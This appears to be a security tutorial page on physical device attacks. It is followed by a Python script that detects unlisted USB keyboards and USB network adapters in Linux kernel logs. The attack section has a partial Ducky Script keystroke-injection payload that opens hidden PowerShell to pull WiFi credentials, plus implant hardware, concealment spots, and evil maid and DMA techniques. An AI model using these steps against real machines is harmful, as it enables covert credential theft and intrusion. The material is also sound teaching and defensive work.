Physical Device Attacks

Exploitation

Once physical access is gained, attackers can plant rogue devices, steal data from unattended machines, or compromise hardware.

physical-device-attacks.sh
# USB Rubber Ducky / Bash Bunny attacks
# Keystroke injection - acts as keyboard

# Example Ducky Script (exfiltrate WiFi passwords)
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000
STRING (netsh wlan show profiles) | Select-String ":(.+)$"
ENTER
# ... continues with exfiltration

# USB Implants
# - O.MG Cable (looks like charging cable)
# - USBKill (fries USB ports)
# - Keylogger (hardware inline)
# - WiFi Pineapple Nano (wireless attacks)

# Raspberry Pi Zero as attack platform
# Configure as USB Ethernet gadget
# Run Responder for credential capture
# P4wnP1 - Turn Pi Zero into attack tool

# Network Implants
# - LAN Turtle (covert network access)
# - Throwing Star LAN Tap (passive sniffing)
# - Shark Jack (automated network attacks)

# Planting Devices - Concealment
# - Inside power strips
# - Behind monitors
# - Under desks
# - In ceiling tiles
# - Inside conference room equipment
# - Attached to network drops

# Evil Maid Attack (unattended laptop)
# Boot from USB
# Modify boot partition
# Install keylogger/backdoor
# Or dump memory/credentials

# DMA Attacks (Thunderbolt/PCIe)
# PCILeech with FPGA
# Can read/write physical memory
# Bypass full disk encryption on running systems
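
From the defender's side, both the keystroke-injection devices and the Pi Zero USB Ethernet gadget listed above leave enumeration records in the Linux kernel log. The following is an added example, not part of the original page: it flags keyboards and USB network interfaces whose vendor/product ID is not on a host allowlist. It assumes kernel messages from the `hid-generic`, `cdc_ether` and `rndis_host` drivers; the function name, allowlist, IDs and log lines are constructed for illustration.

```python
import re

# Assumption: (vendor, product) IDs of peripherals issued for this host (constructed values).
ALLOWED = {("1111", "0001")}

# "usb 1-2: New USB device found, idVendor=..., idProduct=..."
NEW_DEV = re.compile(
    r"usb (\d+-[\d.]+): New USB device found, "
    r"idVendor=([0-9a-f]{4}), idProduct=([0-9a-f]{4})")
# "hid-generic BUS:VID:PID.INST: ... USB HID v1.11 Keyboard [...]"
HID_KBD = re.compile(
    r"hid-generic [0-9A-F]{4}:([0-9A-F]{4}):([0-9A-F]{4})\.[0-9A-F]{4}: "
    r".*USB HID v[\d.]+ Keyboard")
# "cdc_ether 1-3:1.0 usb0: register ..." (USB Ethernet gadgets bind here)
USB_NET = re.compile(
    r"(cdc_ether|rndis_host) (\d+-[\d.]+):\d+\.\d+ (\w+): register")

def find_suspect_usb(lines, allowed=ALLOWED):
    """Return sorted (vid, pid, role) for non-allowlisted keyboards and USB NICs."""
    port_ids = {}      # USB port path -> (vid, pid) of the latest enumeration
    findings = set()
    for line in lines:
        if m := NEW_DEV.search(line):
            port_ids[m.group(1)] = (m.group(2), m.group(3))
        elif m := HID_KBD.search(line):
            dev = (m.group(1).lower(), m.group(2).lower())
            if dev not in allowed:
                findings.add(dev + ("keyboard",))
        elif m := USB_NET.search(line):
            # The driver line carries only the port, so look the IDs up.
            dev = port_ids.get(m.group(2), ("????", "????"))
            if dev not in allowed:
                findings.add(dev + ("network:" + m.group(3),))
    return sorted(findings)

# Constructed sample log: one issued keyboard, one unknown keyboard, one USB NIC.
SAMPLE_LOG = """\
[  101.10] usb 1-1: New USB device found, idVendor=1111, idProduct=0001, bcdDevice= 1.00
[  101.20] hid-generic 0003:1111:0001.0001: input,hidraw0: USB HID v1.10 Keyboard [Issued Keyboard] on usb-0000:00:14.0-1/input0
[ 5400.10] usb 1-2: New USB device found, idVendor=1234, idProduct=abcd, bcdDevice= 1.00
[ 5400.20] hid-generic 0003:1234:ABCD.0004: input,hidraw1: USB HID v1.11 Keyboard [Generic Keyboard] on usb-0000:00:14.0-2/input0
[ 9000.10] usb 1-3: New USB device found, idVendor=5678, idProduct=ef01, bcdDevice= 4.19
[ 9000.20] cdc_ether 1-3:1.0 usb0: register 'cdc_ether' at usb-0000:00:14.0-3, CDC Ethernet Device, 02:00:00:00:00:01
""".splitlines()

if __name__ == "__main__":
    for vid, pid, role in find_suspect_usb(SAMPLE_LOG):
        print(f"unlisted USB device {vid}:{pid} registered as {role}")
```

A device that clones an allowlisted vendor/product ID passes this check, so it works as a triage signal alongside port controls rather than as a control on its own.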